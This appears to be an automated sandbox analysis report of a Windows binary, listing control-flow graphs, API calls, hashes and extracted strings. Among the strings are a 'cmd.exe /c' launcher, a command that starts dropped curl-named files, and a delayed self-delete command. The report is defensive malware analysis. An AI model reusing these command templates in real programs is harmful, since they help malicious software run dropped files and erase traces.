7ff74501b290 LeaveCriticalSection 22127->22129 22133 7ff745004be0 22134 7ff745004bf8 22133->22134 22135 7ff745004c04 ctype 22133->22135 22136 7ff745004c15 ctype 22135->22136 22137 7ff745004d4e 22135->22137 22140 7ff74501a7f4 22135->22140 22137->22136 22139 7ff74501a7f4 _fread_nolock 51 API calls 22137->22139 22139->22136 22143 7ff74501a814 22140->22143 22144 7ff74501a83e 22143->22144 22145 7ff74501a80c 22143->22145 22144->22145 22146 7ff74501a88a 22144->22146 22147 7ff74501a84d __scrt_get_show_window_mode 22144->22147 22145->22135 22156 7ff745019ca8 EnterCriticalSection 22146->22156 22149 7ff74501b1d0 _set_fmode 13 API calls 22147->22149 22151 7ff74501a862 22149->22151 22153 7ff74501aff8 _invalid_parameter_noinfo 35 API calls 22151->22153 22153->22145 21096 7ff74502d5df 21099 7ff745019cb4 LeaveCriticalSection 21096->21099 22213 7ff745004800 22214 7ff745004813 22213->22214 22215 7ff74500483f 22213->22215 22214->22215 22218 7ff745019754 22214->22218 22219 7ff745019769 22218->22219 22220 7ff745019762 22218->22220 22222 7ff74500482f 22219->22222 22227 7ff74501954c 22219->22227 22224 7ff74501958c 22220->22224 22234 7ff745019468 22224->22234 22242 7ff745019ca8 EnterCriticalSection 22227->22242 22241 7ff74501b23c EnterCriticalSection 22234->22241 22309 7ff74501c400 22314 7ff74501b23c EnterCriticalSection 22309->22314 22318 7ff745019c04 22319 7ff745019c0f 22318->22319 22327 7ff7450221cc 22319->22327 22340 7ff74501b23c EnterCriticalSection 22327->22340

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF74502ABEC Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 77 7ff74502abec-7ff74502ac5d call 7ff74502a914 80 7ff74502ac77-7ff74502ac81 call 7ff745027318 77->80 81 7ff74502ac5f-7ff74502ac68 call 7ff74501b1ac 77->81 87 7ff74502ac9c-7ff74502ad14 CreateFileW 80->87 88 7ff74502ac83-7ff74502ac9a call 7ff74501b1ac call 7ff74501b1d0 80->88 86 7ff74502ac6b-7ff74502ac72 call 7ff74501b1d0 81->86 100 7ff74502afde-7ff74502affe 86->100 89 7ff74502ad1a-7ff74502ad2d 87->89 90 7ff74502ada2 87->90 88->86 93 7ff74502ad6f-7ff74502ad9d GetLastError call 7ff74501b160 89->93 94 7ff74502ad2f-7ff74502ad33 89->94 96 7ff74502ada5-7ff74502adb0 GetFileType 90->96 93->86 94->93 98 7ff74502ad35-7ff74502ad6d CreateFileW 94->98 101 7ff74502adb2-7ff74502aded GetLastError call 7ff74501b160 CloseHandle 96->101 102 7ff74502ae03-7ff74502ae0a 96->102 98->93 98->96 101->86 113 7ff74502adf3-7ff74502adfe call 7ff74501b1d0 101->113 105 7ff74502ae0c-7ff74502ae10 102->105 106 7ff74502ae12-7ff74502ae15 102->106 109 7ff74502ae1b-7ff74502ae70 call 7ff745027230 105->109 106->109 110 7ff74502ae17 106->110 116 7ff74502ae72-7ff74502ae7e call 7ff74502ab28 109->116 117 7ff74502ae8f-7ff74502aec2 call 7ff74502a694 109->117 110->109 113->86 116->117 125 7ff74502ae80 116->125 123 7ff74502aec8-7ff74502af0b 117->123 124 7ff74502aec4-7ff74502aec6 117->124 127 7ff74502af2d-7ff74502af38 123->127 128 7ff74502af0d-7ff74502af11 123->128 126 7ff74502ae82-7ff74502ae8a call 7ff745021404 124->126 125->126 126->100 130 7ff74502af3e-7ff74502af42 127->130 131 7ff74502afdc 127->131 128->127 129 7ff74502af13-7ff74502af28 128->129 129->127 130->131 133 7ff74502af48-7ff74502af8d CloseHandle CreateFileW 130->133 131->100 135 7ff74502afc2-7ff74502afd7 133->135 136 7ff74502af8f-7ff74502afbd GetLastError call 7ff74501b160 call 7ff745027458 133->136 135->131 136->135
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                  • Opcode ID: 457a38b2b65a12c21426f51fa5410eaec7f270bc95e61a3b30d8afd352964072
                                                                                                                                                                                                  • Instruction ID: 6744afe561811e10ffe283af4737a92d01a5c2e68ef157aedc97739a51bdb7da
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 457a38b2b65a12c21426f51fa5410eaec7f270bc95e61a3b30d8afd352964072
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67C1CF3AB28A41C6EB10EF78C4802AC7761E749F98F954225EB1E577A5DF38E852C710
                                                                                                                                                                                                  Function 00007FF745021F6C Relevance: 12.6, Strings: 10, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: AreFileApisANSI$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                                                  • API String ID: 0-4046831456
                                                                                                                                                                                                  • Opcode ID: d982793faf7943a56753252a8dfaf9a88c317d1c39ea2cbe423471cd6719a038
                                                                                                                                                                                                  • Instruction ID: 554fdda0b82718b8442d6a4ca231f7187e06c791e2a51cb9d02d478ba9798303
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d982793faf7943a56753252a8dfaf9a88c317d1c39ea2cbe423471cd6719a038
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85419768A4D64BD4EE15FBB4E8806F4A360AF51F48BC05436D90D07275EF3CBA49C760
                                                                                                                                                                                                  Function 00007FF74501B328 Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: ac55a878db088f0c3bc0c4bc90e570b5d24bc041ca286daf2eac4e180e2aa515
                                                                                                                                                                                                  • Instruction ID: d9fbe5d0af50e031372777aefdf465432e02f1a4f4eb72679f1243f65d0751c6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac55a878db088f0c3bc0c4bc90e570b5d24bc041ca286daf2eac4e180e2aa515
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7181AD36A08A01C6EB60FF35848137DA360FB44F98F984636EE1E877A4DF39D4518351
                                                                                                                                                                                                  Function 00007FF7450043D0 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 234COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 7ff7450043d0-7ff745004517 call 7ff745003ad0 call 7ff745007f80 * 3 call 7ff745004170 * 3 call 7ff745009560 call 7ff745003fc0 19 7ff74500454f-7ff7450045df call 7ff745003ad0 call 7ff745009560 call 7ff745003fc0 0->19 20 7ff745004519-7ff74500452f 0->20 33 7ff7450045e4-7ff7450045ed 19->33 21 7ff745004531-7ff745004544 20->21 22 7ff74500454a call 7ff745013700 20->22 21->22 25 7ff7450047b9-7ff7450047be call 7ff74501b018 21->25 22->19 32 7ff7450047bf-7ff7450047c4 call 7ff74501b018 25->32 42 7ff7450047c5-7ff7450047eb call 7ff74501b018 call 7ff745008110 32->42 35 7ff745004626-7ff74500462e 33->35 36 7ff7450045ef-7ff745004606 33->36 40 7ff745004666-7ff74500466e 35->40 41 7ff745004630-7ff745004646 35->41 38 7ff745004621 call 7ff745013700 36->38 39 7ff745004608-7ff74500461b 36->39 38->35 39->32 39->38 47 7ff7450046a6-7ff7450046c1 40->47 48 7ff745004670-7ff745004686 40->48 45 7ff745004661 call 7ff745013700 41->45 46 7ff745004648-7ff74500465b 41->46 45->40 46->42 46->45 52 7ff7450046c3-7ff7450046d9 47->52 53 7ff745004701-7ff745004712 47->53 49 7ff7450046a1 call 7ff745013700 48->49 50 7ff745004688-7ff74500469b 48->50 49->47 50->49 55 7ff7450047b3-7ff7450047b8 call 7ff74501b018 50->55 58 7ff7450046f4-7ff7450046f9 call 7ff745013700 52->58 59 7ff7450046db-7ff7450046ee 52->59 60 7ff745004714-7ff74500472b 53->60 61 7ff745004747-7ff745004760 53->61 55->25 58->53 59->55 59->58 65 7ff745004742 call 7ff745013700 60->65 66 7ff74500472d-7ff745004740 60->66 67 7ff745004794-7ff7450047b2 call 7ff7450136e0 61->67 68 7ff745004762-7ff745004778 61->68 65->61 66->55 66->65 69 7ff74500478f call 7ff745013700 68->69 70 7ff74500477a-7ff74500478d 68->70 69->67 70->55 70->69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF745003A60: GetModuleHandleExW.KERNEL32 ref: 00007FF745003B33
                                                                                                                                                                                                    • Part of subcall function 00007FF745007F80: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7450080F0
                                                                                                                                                                                                    • Part of subcall function 00007FF745007F80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7450080F6
                                                                                                                                                                                                    • Part of subcall function 00007FF745003FC0: CreateProcessW.KERNELBASE ref: 00007FF7450040DF
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7450047B3
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7450047B9
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7450047BF
                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7450047C5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCreateHandleModuleProcess
                                                                                                                                                                                                  • String ID: %$\curlapp64.exe$\libcurl.dll$\zlib1.dll$start "" "{}"$timeout /t 10 /nobreak && del /q "{}"
                                                                                                                                                                                                  • API String ID: 2619043766-39270516
                                                                                                                                                                                                  • Opcode ID: 043b67955de47c377d9c845c363c2c9a44a6f48bd6ed14e8aaafd9edb56fc093
                                                                                                                                                                                                  • Instruction ID: b1a0dbd675c54cd2a1d8dbf97cac8e82fd2c615269d4782271f3671a8aa29b8d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 043b67955de47c377d9c845c363c2c9a44a6f48bd6ed14e8aaafd9edb56fc093
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EB18766B1CB45C4EB00FB78E4453ADA361FB85BA4F901231EA9C12AE9EF7CD185C750
                                                                                                                                                                                                  Function 00007FF745008110 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                  • Opcode ID: 94f92c0075dfae4e7bae8e4b171b00ac0696060e85a7182d222d777efbacba36
                                                                                                                                                                                                  • Instruction ID: bc75be47d75948eeca77c5e02eb33ebc013c144d3a49d65a2fb5f2807cdd5217
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94f92c0075dfae4e7bae8e4b171b00ac0696060e85a7182d222d777efbacba36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C314F2AA0CA42C1EA25FB25F8441BAA361FF95F94F9C0131DA8D077B9DE3CE541C720
                                                                                                                                                                                                  Function 00007FF745003FC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107processCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandle$CreateProcess_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: cmd.exe /c {}
                                                                                                                                                                                                  • API String ID: 1307316983-3162138867
                                                                                                                                                                                                  • Opcode ID: 4f5688e10adffc42376bc36b84a3ef4a92cabadf1495aa9546e9282660c1ec4d
                                                                                                                                                                                                  • Instruction ID: 5c30e18dc9b7915ca6eeb78aa508c1edc4076c1f2afb041dd847adbcead036e9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f5688e10adffc42376bc36b84a3ef4a92cabadf1495aa9546e9282660c1ec4d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77416076E18B81CAE700DF74E8403EEB3B1F798B58F505225EA9C16A69EF78D194C700
                                                                                                                                                                                                  Function 00007FF745008910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 2775327233-1405518554
                                                                                                                                                                                                  • Opcode ID: b4d352fe6265569942ff8821a836edb4901f6a8d185c2a7465494993de83202b
                                                                                                                                                                                                  • Instruction ID: dcefc62f0a5afa93ea98c2cadbde490f93fb82c0da8ffcf86ceb98f5dae5bcd3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4d352fe6265569942ff8821a836edb4901f6a8d185c2a7465494993de83202b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB416D26B0EA41C9FB24FFB0E4903FCA2A4EF45F48F884434EA4D26E65DE38D5119365
                                                                                                                                                                                                  Function 00007FF745020F3C Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 269 7ff745020f3c-7ff745020f61 270 7ff745021258 269->270 271 7ff745020f67-7ff745020f6a 269->271 272 7ff74502125a-7ff74502126a 270->272 273 7ff745020f6c-7ff745020f9e call 7ff74501af40 271->273 274 7ff745020fa3-7ff745020fcb 271->274 273->272 276 7ff745020fcd-7ff745020fd4 274->276 277 7ff745020fd6-7ff745020fdc 274->277 276->273 276->277 279 7ff745020fec-7ff745021003 call 7ff74502a064 277->279 280 7ff745020fde-7ff745020fe7 call 7ff745023870 277->280 284 7ff745021009-7ff745021012 279->284 285 7ff745021124-7ff74502113e 279->285 280->279 284->285 288 7ff745021018-7ff74502101b 284->288 286 7ff745021140-7ff745021146 285->286 287 7ff745021195-7ff7450211ba WriteFile 285->287 289 7ff745021148-7ff74502114b 286->289 290 7ff74502117e-7ff745021190 call 7ff7450209ec 286->290 293 7ff7450211bc-7ff7450211c2 GetLastError 287->293 294 7ff7450211c5 287->294 291 7ff74502102e-7ff745021039 288->291 292 7ff74502101d-7ff745021027 call 7ff74501c090 288->292 295 7ff74502116a-7ff74502117c call 7ff745020c10 289->295 296 7ff74502114d-7ff745021150 289->296 317 7ff745021111-7ff745021118 290->317 298 7ff74502104a-7ff745021062 GetConsoleMode 291->298 299 7ff74502103b-7ff745021044 291->299 292->291 293->294 301 7ff7450211c8 294->301 295->317 303 7ff7450211d9-7ff7450211e3 296->303 304 7ff745021156-7ff745021168 call 7ff745020af4 296->304 307 7ff745021068-7ff74502106e 298->307 308 7ff74502111d 298->308 299->285 299->298 302 7ff7450211cd 301->302 310 7ff7450211d2 302->310 311 7ff745021251-7ff745021256 303->311 312 7ff7450211e5-7ff7450211ea 303->312 304->317 315 7ff7450210fa-7ff74502110c call 7ff745020558 307->315 316 7ff745021074-7ff745021077 307->316 308->285 310->303 311->272 318 7ff745021218-7ff745021232 312->318 319 7ff7450211ec-7ff7450211ef 312->319 315->317 322 7ff745021079-7ff74502107c 316->322 323 7ff745021082-7ff745021090 316->323 317->302 326 7ff745021239-7ff745021248 318->326 327 7ff745021234-7ff745021237 318->327 324 7ff745021208-7ff745021213 call 7ff74501b188 319->324 325 7ff7450211f1-7ff745021200 319->325 322->310 322->323 323->301 328 7ff745021096 323->328 324->318 325->324 326->311 327->270 327->326 329 7ff74502109a-7ff7450210b1 call 7ff74502a0c4 328->329 334 7ff7450210ec-7ff7450210f5 GetLastError 329->334 335 7ff7450210b3-7ff7450210bf 329->335 334->301 336 7ff7450210de-7ff7450210e5 335->336 337 7ff7450210c1-7ff7450210d3 call 7ff74502a0c4 335->337 336->329 339 7ff7450210e7 336->339 337->334 341 7ff7450210d5-7ff7450210dc 337->341 339->301 341->336
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF745020F27,?), ref: 00007FF74502105A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                                                                                  • Opcode ID: 6ba8d27c22b473721a1a14c23e4bd0d27965624397cd697b513ddc4e0b05cf70
                                                                                                                                                                                                  • Instruction ID: 2ca06f17273542f97915cbe3f224562b212acaf57a0de68d92117bb20a51f9dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ba8d27c22b473721a1a14c23e4bd0d27965624397cd697b513ddc4e0b05cf70
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4891F83AA1C652D5FB50FBB594902BDA7A0BB44F48F840136EE0E576A5CE3CE845C720
                                                                                                                                                                                                  Function 00007FF74501385C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                                                  • Opcode ID: 4ff4bdefbc55f34c7b5e543c71956096d91db1c7959ef7c5b2d421097c456a3a
                                                                                                                                                                                                  • Instruction ID: 8661deb57ab4609688c6de7b3c181e9915bf18a5a2c021d77bcfe04f9b33a23e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ff4bdefbc55f34c7b5e543c71956096d91db1c7959ef7c5b2d421097c456a3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C310E19E4C243C2FA24BB74A4513F9A791AF41F44FC45438E98E472F7EE2EA804C636
                                                                                                                                                                                                  Function 00007FF745012AEC Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2016263034-0
                                                                                                                                                                                                  • Opcode ID: 5d8d2bf6e7179084e5c2b0f71ec74909b6f2433d0974f14e6a3337169ec52b91
                                                                                                                                                                                                  • Instruction ID: 37d949c3ef3345dd4b01e9466fea2786b967e818f2c6ca3cf6e238913af12867
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d8d2bf6e7179084e5c2b0f71ec74909b6f2433d0974f14e6a3337169ec52b91
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94215A69A0CA86C5EA14BF22E99027DA760EB85F84F984035DA4D073B5DF3DE845C321
                                                                                                                                                                                                  Function 00007FF74501CEA0 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
